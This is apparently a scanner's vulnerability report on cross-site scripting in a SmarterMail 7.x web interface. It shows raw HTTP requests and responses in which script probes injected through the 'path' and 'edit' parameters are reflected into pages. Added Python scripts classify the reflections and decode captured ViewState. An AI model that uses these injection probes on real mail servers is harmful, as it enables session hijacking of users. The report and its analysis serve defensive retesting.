<div class="HyperGridWrapper" id="ctl00_MPH_FilesGrid">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_FilesGrid_Table"><tr><td class="NoItems" colspan="4">There are no items to show in this list</td></tr>
</table>
<input type="hidden" name="ctl00_MPH_FilesGrid_HiddenInput" id="ctl00_MPH_FilesGrid_HiddenInput" value="" /><input type="hidden" name="ctl00_MPH_FilesGrid_HiddenLSR" id="ctl00_MPH_FilesGrid_HiddenLSR" value="" />
</div>
</div>

<a id="ctl00_MPH_UpdateGridButton" href="javascript:__doPostBack('ctl00$MPH$UpdateGridButton','')"></a>

</div>

</div>

<div id="ctl00_OMPH_AttachmentsAreaPanel">
<div class="AttachmentsArea" id="AttachmentsArea" style="display: none;">
<div class='plupload_scroll'>
<div class="plupload_content">
<div class="plupload_filelist_header">
<div class="plupload_file_name">
Filename</div>
<div class="plupload_file_action">
&nbsp;</div>
<div class="plupload_file_status">
<span>
Status</span></div>
<div class="plupload_file_size">
Size</div>
<div class="plupload_clearer">
&nbsp;</div>
</div>
<div class="plupload_filelist">
<ul id="uploader_filelist" class="plupload_filelist2">
</ul>
<ul class="plupload_filelist1">

</ul>
</div>
</div>
</div>
</div>
</div>

<div id="ctl00_Footer" class="Footer">
<div class="FooterNav">

</div>
<div class="FooterSummary">

</div>
</div>

<script type="text/javascript">
document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
var searchId = 'ctl00_SearchRow';
if (parent.HelpPageID) parent.HelpPageID('main/frmstoredfiles', '');
$(function() {
if (parent.DoneLoading) parent.DoneLoading();
InitAjaxHandlers();
RegisterResizeEvent();
});
</script>



<script type="text/javascript">
function updateGrid() {
__doPostBack('ctl00$MPH$UpdateGridButton','');
}

function DoubleClick(url) {
SpawnHyperWindow(url, 427, 275, updateGrid);
}

function CheckForRows()
{
var grid = self.ctl00_MPH_FilesGrid;

if(grid == null || !grid.InitializeGrid || grid.GetSelectedRows().length == 0) { ShowAlertWindow('No item has been selected'); return; }

__doPostBack('ctl00$BPH$DownloadButton','')
}
</script>

<script type="text/javascript">
var uploadButtonClientID = "ctl00_BPH_UploadButton";

var uploader, uploaderTarget, uploaderId;
var WebPathVirtualAppPath = "/";
var Message_AttachmentTooLarge = "Your attachment exceeds the maximum allowed size.";
var Message_AttachmentZeroBytes = "One or more files are zero bytes and will not be uploaded.";
var Text_KB = "KB";
var Text_MB = "MB";
var Text_B = "B";
var GenericUploadError = "Error uploading one or more files. Please verify that the file does not exist and is not of a restricted type.";
var isBusy = false;
var ErrorText = "Error";
var activeUploadRuntime = '';

document.AdditionalResizeEvent = resizePage;

var resizePage = function() {
if(uploader && uploader.files.length > 0)
{
if ($('#AttachmentsArea').css('display') != 'none') {
scrollableSize = $('#Scrollable').outerHeight();
scrollableSize -= $('#AttachmentsArea').outerHeight();
$('#Scrollable').height(scrollableSize);
}
}
}

var initUploader = function() {
uploaderTarget = $(this);
uploaderId = uploaderTarget.attr('id');

if (!uploaderId) {
uploaderId = plupload.guid();
uploaderTarget.attr('id', uploaderId);
}

uploader = new plupload.Uploader({
runtimes: 'flash,html5,html4',
browse_button: uploadButtonClientID,
container: uploadButtonClientID,
chunk_size: '100kb',
max_file_size: 10485760,
filters: [{ title: "All Files", extensions: "*"}],
url: WebPathVirtualAppPath + "FileStorageUpload.ashx?uploadValidationToken=0145da44d7014edea0816314f1ea86b8&pathField='%22--%3e%3cscript%3enetsparker(0x0001B4)%3c%2fscript%3e&userField=dummy&domainField=hoytllc.com",
flash_swf_url: WebPathVirtualAppPath + 'UserControls/ThirdPartyComponents/plupload.flash_1_2_3.swf',
silverlight_xap_url: WebPathVirtualAppPath + 'UserControls/ThirdPartyComponents/plupload.silverlight.1_2_1.xap'
});

uploader.bind("UploadFile", function(up, file) {
$('#' + file.id).addClass('plupload_uploading');
});

uploader.bind('FileUploaded', function(up, file) {
updateList(false);
});

uploader.bind('FilesAdded', function(up, files) {
var alertShown = false;
$.each(files, function(i, file) {
if (file.size > uploader.settings.max_file_size && !alertShown) {
ShowAlertWindow(Message_AttachmentTooLarge);
alertShown = true;
}
else if (file.size == 0 && !alertShown) {
ShowAlertWindow(Message_AttachmentZeroBytes);
alertShown = true;
}
});
});

uploader.bind("Error", function(up, err) {
var file = err.file, message;
if (file) {
message = err.message;
if (err.details) {
message += " (" + err.details + ")";
}
updateList(false);
}
});

uploader.bind('QueueChanged', function(up) {
if (uploader.files.length > 0)
ShowAttachentsArea(true, true);
if (updateList(true)) {
uploader.start();
}
});

uploader.bind('UploadProgress', function(up, file) {
isBusy = true;

updateList(false);
busyTimeout = window.setTimeout("isBusy = false;", 5000);
});

uploader.bind('StateChanged', function() {
updateList(false);
});

uploader.init();
};

function updateList(scrolldown) {
var retVal = false;
var fileList = $('ul.plupload_filelist2', uploaderTarget).html(''), inputCount = 0, inputHTML;
var fileListHtmlInProgress = "";
var fileListHtmlInQueue = "";
var fileListHtmlCompleted = "";

$.each(uploader.files, function(i, file) {
inputHTML = '';

if (file.status == plupload.DONE || file.status == plupload.FAILED) {
if (file.target_name) {
inputHTML += '<input type="hidden" name="' + uploaderId + '_' + inputCount + '_tmpname" value="' + plupload.xmlEncode(file.target_name) + '" />';
}
inputHTML += '<input type="hidden" name="' + uploaderId + '_' + inputCount + '_name" value="' + plupload.xmlEncode(file.name) + '" />';
inputHTML += '<input type="hidden" name="' + uploaderId + '_' + inputCount + '_status" value="' + (file.status == plupload.DONE ? 'done' : 'failed') + '" />';
inputCount++;
}
else if (file.status == plupload.STOPPED)
retVal = true;

var text = generateUploadListItem(file.id, file.name, file.percent, file.size, inputHTML, file.status);

if (file.status == plupload.QUEUED)
fileListHtmlInQueue += text;
else if (file.status == plupload.UPLOADING)
fileListHtmlInProgress += text;
else
fileListHtmlCompleted += text;
});

fileList.append(fileListHtmlInProgress);
fileList.append(fileListHtmlInQueue);
fileList.append(fileListHtmlCompleted);

fileList[0].scrollTop = 0;

if (uploader.total.uploaded + uploader.total.failed == uploader.files.length) {
uploader.stop();
updateGrid();

if (uploader.total.failed == 0)
ShowAttachentsArea(false, true);
else if(!top.confirmRadWindow)
ShowAlertWindow(GenericUploadError);
}

return retVal;
}

function generateUploadListItem(id, name, percent, size, extraHtml, status) {
var sizeString;

if (activeUploadRuntime == 'html4') {
sizeString = "Unknown";
}
else if (size > 10485760)
sizeString = Math.round(size / 1048576, 1) + " " + Text_MB;
else if (size > 1024)
sizeString = Math.round(size / 1024, 1) + " " + Text_KB;
else
sizeString = size + " " + Text_B;

var actionClass = "";

switch (status) {
case plupload.DONE: actionClass = 'plupload_done'; break;
case plupload.FAILED: actionClass = 'plupload_failed'; break;
case plupload.QUEUED: actionClass = 'plupload_queued'; break;
case plupload.UPLOADING: actionClass = 'plupload_uploading'; break;
default: actionClass = 'plupload_failed'; break;
}

if (percent > 0 && actionClass != 'plupload_failed' && actionClass != 'plupload_done')
..
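The responses in this section reflect the `path` value in five places: the page `<title>`, the form `action`, the `PageTitle` div, the `ctl00$MPH$pathField` hidden input and the plupload `url:` string. Only one of those contexts actually runs the probe, which is the distinction a retest has to make. The following script is an added example, not part of the Netsparker report and not SmarterMail code: it parses a captured response and classifies every reflection of the probe by the HTML context it lands in. The embedded excerpt is constructed to mirror the five reflections above with the surrounding boilerplate removed; the `MARKER`/`PROBE` names, the `audit()` function and the verdict labels are this example's own.

```python
"""Classify where a scanner's XSS probe lands in a captured response and whether it can execute."""
from html.parser import HTMLParser
from urllib.parse import quote

MARKER = "netsparker(0x0001B4)"                  # the call the probe makes when it runs
PROBE = "'\"--><script>" + MARKER + "</script>"   # the probe as sent in the `path` parameter
PROBE_URL = quote(PROBE, safe="'()").lower()      # the form seen in action= and in the upload URL

VOID = {"input", "br", "img", "meta", "link", "hr", "area", "base", "col", "embed", "source"}

# Constructed excerpt mirroring the frmStoredFiles.aspx response above: the same five
# reflections in the same contexts, boilerplate removed.
RESPONSE = """<html><head><title>
'"--><script>netsparker(0x0001B4)</script> - hoytllc.com - SmarterMail
</title></head><body>
<form method="post" action="frmStoredFiles.aspx?path='%22--%3e%3cscript%3enetsparker(0x0001B4)%3c%2fscript%3e" id="aspnetForm">
<div id="PageTitle" class="PageTitleText">
'"--><script>netsparker(0x0001B4)</script>
</div>
<input type="hidden" name="ctl00$MPH$pathField" id="ctl00_MPH_pathField" value="'&quot;-->&lt;script>netsparker(0x0001B4)&lt;/script>" />
<script type="text/javascript">
var url = "/FileStorageUpload.ashx?pathField='%22--%3e%3cscript%3enetsparker(0x0001B4)%3c%2fscript%3e";
</script>
</form></body></html>
"""


def classify(fragment):
    """How the probe appears in one fragment of the response, or None if the marker is absent."""
    if PROBE in fragment:
        return "raw"
    if PROBE_URL in fragment.lower():
        return "url-encoded"
    if MARKER not in fragment:
        return None
    return "html-encoded" if "&lt;script" in fragment else "marker only"


def describe(tag, attrs):
    ident = dict(attrs).get("id")
    return f'<{tag} id="{ident}">' if ident else f"<{tag}>"


class ReflectionAudit(HTMLParser):
    # Treat <title>/<textarea> like <script>/<style>: browsers do not parse tags inside them
    # (RCDATA), so a probe reflected there cannot execute unless it first closes the element.
    CDATA_CONTENT_ELEMENTS = ("script", "style", "title", "textarea")

    def __init__(self):
        super().__init__(convert_charrefs=False)  # keep entities as written; the raw form matters
        self.stack = []                  # open, non-void elements
        self.previous = "(document)"     # last non-script element opened: names where a <script> landed
        self.findings = []               # (context, form, verdict) in document order

    def handle_starttag(self, tag, attrs):
        raw = self.get_starttag_text() or ""     # tag text before attribute values are unescaped
        form = classify(raw)
        if form is not None:
            # The probe stayed inside an attribute value (entity- or URL-encoded): inert. A raw
            # `"` breakout would end the tag early and surface below as a <script> body instead.
            self.findings.append((f"attribute of {describe(tag, attrs)}", form, "inert"))
        if tag != "script":
            self.previous = describe(tag, attrs)
        if tag not in VOID:
            self.stack.append(tag)

    def handle_endtag(self, tag):
        if tag in self.stack:
            while self.stack.pop() != tag:
                pass

    def handle_data(self, data):
        form = classify(data)
        if form is None:
            return
        top = self.stack[-1] if self.stack else None
        if top == "script":
            if form == "marker only":
                # The probe's own tags were consumed by the parser: its call is now script body.
                self.findings.append((f"<script> body following {self.previous}", "raw", "executable"))
            else:
                self.findings.append((f"<script> body following {self.previous}", form, "inert"))
        elif top == "title":
            self.findings.append(("<title> text", form, "inert"))
        else:
            self.findings.append((f"text inside <{top}>", form, "inert"))


def audit(html):
    parser = ReflectionAudit()
    parser.feed(html)
    parser.close()
    return parser.findings


def executable_contexts(html):
    return [context for context, _form, verdict in audit(html) if verdict == "executable"]


if __name__ == "__main__":
    for context, form, verdict in audit(RESPONSE):
        print(f"{verdict:10} {form:13} {context}")
```

Run against the excerpt, the only `executable` finding is the `<script>` body that follows `<div id="PageTitle">`: the div writes the value as raw text, the browser parses the probe's tags, and `netsparker(0x0001B4)` runs, which is the call Netsparker watches for when it confirms a finding. The `<title>` reflection is raw as well, but browsers treat `<title>` as RCDATA, so a payload there needs a `</title>` before it can do anything. The hidden input is inert because `"` and `<` were entity-encoded, and the two URL-encoded copies are inert only while the enclosing JavaScript string stays double-quoted, since the probe's `'` survives URL encoding.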
- /UserControls/Popups/frmAddFileStorageFolder.aspx

/UserControls/Popups/frmAddFileStorageFolder.aspx CONFIRMED

http://vulnerable.smartermail.7.x.host:9998/UserControls/Popups/frmAddFileStorageFolder.aspx?edit='%22--%3E%3Cscript%3Ealer..

Parameters

Parameter Type Value
edit GET '"--><script>alert(0x00145F)</script>

Request

GET /UserControls/Popups/frmAddFileStorageFolder.aspx?edit='%22--%3E%3Cscript%3Enetsparker(0x00145F)%3C/script%3E HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Default.aspx?section=UserStorage
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 01:09:54 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 2734
Connection: Close




<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head id="ctl00_head1"><title>
Folder
</title><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Popup/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="innerpopup" dir="ltr">
<form method="post" action="frmAddFileStorageFolder.aspx?edit='%22--%3e%3cscript%3enetsparker(0x00145F)%3c%2fscript%3e" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNjQzNzgwNTYzDxYGHghfX19UaXRsZQUGRm9sZGVyHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYGAgUPFgIeB1Zpc2libGVoZAIHD2QWAmYPZBYCAgEPFgIfA2gWAgIBDxYCHgRUZXh0ZWQCCw9kFgICAQ9kFgJmD2QWAgIBD2QWBGYPZBYCAgEPZBYEZg8QZBAVAQtSb290IEZvbGRlchUBDFJvb3QgRm9sZGVyXBQrAwFnZGQCAg8PFgIfBAULUm9vdCBGb2xkZXJkZAIBDw8WAh8DZ2QWAgIBD2QWAgICDw8WAh8EBSonIi0tPjxzY3JpcHQ+bmV0c3BhcmtlcigweDAwMTQ1Rik8L3NjcmlwdD5kZGTNAEATGfSDfFcX08CBkEvOXkfY/g==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/WebResource.axd?d=sooKBuYSerZQi58Dl6wqJg2&amp;t=633802452069218315" type="text/javascript"></script>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>

<script language="javascript" type="text/javascript">
document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
$(function() { setTimeout(function() { GetFocus(); }, 50); RegisterResizeEvent(); });
</script>

<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$UpdatePanel1'], ['ctl00$BrPH$SaveButton'], [], 90);
//]]>
</script>


<span id="ctl00_UpdatePanel1">

</span>

<div id="Scrollable" class="ContentDiv">

<div id="ctl00_MPH_UpdatePanel1">

<table id="ctl00_MPH_SettingsContainer1" class="SettingsContainer SCMarginTop" border="0">
<tr id="ctl00_MPH_ddFolders">
<td id="ctl00_MPH_ddFolders_Label" class="Indent Fixed">Parent</td><td id="ctl00_MPH_ddFolders_Setting" class="Setting"><select name="ctl00$MPH$ddFolders_SettingDropDown" id="ctl00_MPH_ddFolders_SettingDropDown">
<option selected="selected" value="Root Folder\">Root Folder</option>

</select></td>
</tr><tr id="ctl00_MPH_lblOldFolderName">
<td id="ctl00_MPH_lblOldFolderName_Label" class="Indent Fixed">Old Name</td><td id="ctl00_MPH_lblOldFolderName_Setting" class="Setting"><span id="ctl00_MPH_lblOldFolderName_ReadOnlyLabel">'"--><script>netsparker(0x00145F)</script></span></td>
</tr><tr id="ctl00_MPH_txtFolderName">
<td id="ctl00_MPH_txtFolderName_Label" class="Indent Fixed">Folder</td><td id="ctl00_MPH_txtFolderName_Setting" class="Setting"><input name="ctl00$MPH$txtFolderName_SettingText" type="text" id="ctl00_MPH_txtFolderName_SettingText" class="text" /></td>
</tr>
</table>

</div>

</div>
<div id="ctl00_Button" class="PopupButtons">
<div class="ButtonBarLeft">

</div>
<div class="ButtonBarRight">

<div id="ctl00_BrPH_CancelButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ClosePopup(); return false;"><span class="BBInner">Cancel</span></a></div>
<div id="ctl00_BrPH_SaveButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BrPH$SaveButton',''); return false;"><span class="BBInner">Save</span></a></div>

</div>
<div class="ButtonBarClear">
<div class="ie6fix">
&nbsp;</div>
</div>
</div>




<script type="text/javascript">
//<![CDATA[
document.ResizeEvent();UpdateSidebarCounts('UserSync', 0);
WebForm_AutoFocus('ctl00_MPH_txtFolderName_SettingText');Sys.Application.initialize();
modules['vmNotBlank_txt']='Must have a value';
modules['vmNoInvalidCharsOrBackslash_txt']='Must not contain / : * ? | < > " \\';
$(function() {$vc({"lt":"Folder","vcID":"ctl00_MPH_txtFolderName_SettingText","VMs":["vmNotBlank","vmNoInvalidCharsOrBackslash"],"VPs":{"vmRequired":true}},true);});
//]]>
</script>
</form>
</body>
</html>
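The `__VIEWSTATE` values captured in this section are worth decoding, because they show where the probe is being carried. The script below is an added example, not part of the report and not SmarterMail code: it base64-decodes the ViewState from the first frmStoredFiles.aspx response above, from the frmAddFileStorageFolder.aspx response just above, and from the frmStoredFiles.aspx POST request that follows, and reads out the serialized page title. The token bytes (`0x05` string, `0x1E` indexed-string-add, 7-bit length prefixes) are those of the ASP.NET 2.0 ObjectStateFormatter; the `___Title` key is simply what appears in the decoded bytes, and the function names are this example's own. The three base64 strings are copied from the report's own evidence.

```python
"""Decode the __VIEWSTATE fields captured in this section and read the serialized page title."""
import base64
import binascii
from urllib.parse import unquote

# __VIEWSTATE values copied verbatim from the report's requests and responses (not constructed).
VS_STOREDFILES_RESPONSE = "/wEPDwUKLTY3NjA2Njk1Nw8WBh4IX19fVGl0bGUFKiciLS0+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMUI0KTwvc2NyaXB0Ph4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWCAIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx4HVmlzaWJsZWhkAgYPFgIfBGhkAgcPZBYCZg9kFgICAQ8WAh8EaBYCAgEPFgIeBFRleHRlZAIIDxYCHwRoZBgBBRNjdGwwMCRNUEgkRmlsZXNHcmlkDwUkVHJ1ZXxUcnVlfHxGYWxzZXxUcnVlfHxGYWxzZXxGYWxzZXwwZD8ETBn4y53viAfrZ6+Mhn0AyyoN"  # frmStoredFiles.aspx response to ?path=<probe 0x0001B4>
VS_STOREDFILES_POSTED = "/wEPDwUKLTY3NjA2Njk1Nw8WBh4IX19fVGl0bGUFC1Jvb3QgRm9sZGVyHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYIAgQPFgQeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7HgdWaXNpYmxlaGQCBg8WAh8EaGQCBw9kFgJmD2QWAgIBDxYCHwRoFgICAQ8WAh4EVGV4dGVkAggPFgIfBGhkGAEFE2N0bDAwJE1QSCRGaWxlc0dyaWQPBSRUcnVlfFRydWV8fEZhbHNlfFRydWV8fEZhbHNlfEZhbHNlfDBkH73EnZAztfbwXar7gj3Qxj89sFo="  # ViewState the scanner POSTed to frmStoredFiles.aspx?path=<probe 0x0014AA>
VS_ADDFOLDER_RESPONSE = "/wEPDwUJNjQzNzgwNTYzDxYGHghfX19UaXRsZQUGRm9sZGVyHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYGAgUPFgIeB1Zpc2libGVoZAIHD2QWAmYPZBYCAgEPFgIfA2gWAgIBDxYCHgRUZXh0ZWQCCw9kFgICAQ9kFgJmD2QWAgIBD2QWBGYPZBYCAgEPZBYEZg8QZBAVAQtSb290IEZvbGRlchUBDFJvb3QgRm9sZGVyXBQrAwFnZGQCAg8PFgIfBAULUm9vdCBGb2xkZXJkZAIBDw8WAh8DZ2QWAgIBD2QWAgICDw8WAh8EBSonIi0tPjxzY3JpcHQ+bmV0c3BhcmtlcigweDAwMTQ1Rik8L3NjcmlwdD5kZGTNAEATGfSDfFcX08CBkEvOXkfY/g=="  # frmAddFileStorageFolder.aspx response to ?edit=<probe 0x00145F>

# ObjectStateFormatter (ASP.NET 2.0) token bytes seen in the stream
TOKEN_STRING = 0x05               # Token_String: 7-bit length, then UTF-8 bytes
TOKEN_INDEXED_STRING_ADD = 0x1E   # Token_IndexedStringAdd: a key, written once and indexed afterwards
TITLE_KEY = b"___Title"           # key observed in the decoded bytes (this page's title entry)


def decode_viewstate(field):
    """Base64-decode a __VIEWSTATE value as it appears in a report: it may be form-encoded
    (%2f, %3d), have lost its '=' padding, or have lost its tail to report truncation."""
    s = unquote(field).strip()
    s += "=" * (-len(s) % 4)
    try:
        return base64.b64decode(s)
    except binascii.Error:
        s = s.rstrip("=")                        # truncated evidence: decode the longest clean prefix
        return base64.b64decode(s[: len(s) - len(s) % 4])


def read_7bit_int(buf, pos):
    """BinaryReader.Read7BitEncodedInt: little-endian base-128, high bit means 'more'."""
    value = shift = 0
    while True:
        b = buf[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            return value, pos
        shift += 7


def viewstate_title(field):
    """Return the string serialized under ___Title, or None if the entry is absent."""
    raw = decode_viewstate(field)
    key = bytes([TOKEN_INDEXED_STRING_ADD, len(TITLE_KEY)]) + TITLE_KEY + bytes([TOKEN_STRING])
    pos = raw.find(key)
    if pos < 0:
        return None
    length, pos = read_7bit_int(raw, pos + len(key))
    return raw[pos:pos + length].decode("utf-8")


def viewstate_contains(field, text):
    """True if the text is carried anywhere in the decoded ViewState."""
    return text.encode("utf-8") in decode_viewstate(field)


def summary():
    """(title, probe carried?) for each captured ViewState, keyed by where it was captured."""
    captured = {
        "frmStoredFiles.aspx response": VS_STOREDFILES_RESPONSE,
        "frmStoredFiles.aspx POSTed": VS_STOREDFILES_POSTED,
        "frmAddFileStorageFolder.aspx response": VS_ADDFOLDER_RESPONSE,
    }
    return {where: (viewstate_title(vs), viewstate_contains(vs, "netsparker(")) for where, vs in captured.items()}


if __name__ == "__main__":
    for where, (title, carries_probe) in summary().items():
        print(f"{where:40} title={title!r}  probe in ViewState={carries_probe}")
```

For the first frmStoredFiles.aspx response the title entry is the probe itself. The ViewState the scanner posted in the frmStoredFiles.aspx request below still says `Root Folder`, and the response to that request carries the new probe, so the title is taken from the request's `path` query parameter each time and ViewState only echoes it back; ViewState is client-held state, not server storage, and is not where the "permanent" part of this finding would live. In the frmAddFileStorageFolder.aspx response the title is `Folder` and the probe sits elsewhere in the stream, matching the `Old Name` label where it is rendered. Whether the name is also persisted as a stored-files folder is not visible in these responses, whose grids list no items, so a retest should create a folder with a payload name and then load frmStoredFiles.aspx without a `path` parameter. The 20 bytes after the last data token look like the ViewState MAC; a MAC protects integrity only, so anything serialized into ViewState, the probe included, is readable by whoever holds the page.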

- /Main/frmStoredFiles.aspx

/Main/frmStoredFiles.aspx CONFIRMED

http://vulnerable.smartermail.7.x.host:9998/Main/frmStoredFiles.aspx?path='%22--%3E%3Cscript%3Ealert(0x0014AA)%3C/script%3E

Parameters

Parameter Type Value
path GET '"--><script>alert(0x0014AA)</script>
__EVENTARGUMENT POST 3
__EVENTTARGET POST 3
__VIEWSTATE POST /wEPDwUKLTY3NjA2Njk1Nw8WBh4IX19fVGl0bGUFC1Jvb3QgRm9sZGVyHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYIAgQPFgQeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7HgdWaXNpYmxlaGQCBg8WAh8EaGQCBw9kFgJmD2QWAgIBDxYCHwRoFgICAQ8WAh4EVGV4dGVkAggPFgIfBGhkGAEFE2N0bDAwJE1QSCRGaWxlc0dyaWQPBSRUcnVlfFRydWV8fEZhbHNlfFRydWV8fEZhbHNlfEZhbHNlfDBkH73EnZAztfbwXar7gj3Qxj89sFo=
+ uploaderId + '_' + inputCount + '_name POST plupload.xmlEncode(file.name)
+ uploaderId + '_' + inputCount + '_status POST (file.status == plupload.DONE ? 'done' : 'failed')
+ uploaderId + '_' + inputCount + '_tmpname POST plupload.xmlEncode(file.target_name)
ctl00$MPH$domainField POST hoytllc.com
ctl00$MPH$pathField POST Root Folder\
ctl00$MPH$uploadValidationToken POST def234bfb6a5429880f5ef74e1fe9c71
ctl00$MPH$userField POST dummy
ctl00_MPH_FilesGrid_HiddenInput POST 3
ctl00_MPH_FilesGrid_HiddenLSR POST 3

Request

POST /Main/frmStoredFiles.aspx?path='%22--%3E%3Cscript%3Enetsparker(0x0014AA)%3C/script%3E HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmStoredFiles.aspx?path=Root+Folder%5c
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Content-Length: 910
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

__EVENTARGUMENT=3&__EVENTTARGET=3&__VIEWSTATE=%2fwEPDwUKLTY3NjA2Njk1Nw8WBh4IX19fVGl0bGUFC1Jvb3QgRm9sZGVyHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYIAgQPFgQeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7HgdWaXNpYmxlaGQCBg8WAh8EaGQCBw9kFgJmD2QWAgIBDxYCHwRoFgICAQ8WAh4EVGV4dGVkAggPFgIfBGhkGAEFE2N0bDAwJE1QSCRGaWxlc0dyaWQPBSRUcnVlfFRydWV8fEZhbHNlfFRydWV8fEZhbHNlfEZhbHNlfDBkH73EnZAztfbwXar7gj3Qxj89sFo%3d&+ uploaderId + '_' + inputCount + '_name=%2b+plupload.xmlEncode(file.name)+%2b&+ uploaderId + '_' + inputCount + '_status=%2b+(file.status+%3d%3d+plupload.DONE+%3f+'done'+%3a+'failed')+%2b&+ uploaderId + '_' + inputCount + '_tmpname=%2b+plupload.xmlEncode(file.target_name)+%2b&ctl00$MPH$domainField=hoytllc.com&ctl00$MPH$pathField=Root+Folder%5c&ctl00$MPH$uploadValidationToken=def234bfb6a5429880f5ef74e1fe9c71&ctl00$MPH$userField=dummy&ctl00_MPH_FilesGrid_HiddenInput=3&ctl00_MPH_FilesGrid_HiddenLSR=3

Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 01:10:50 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6375
Connection: Close




<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
'"--><script>netsparker(0x0014AA)</script> - hoytllc.com - SmarterMail
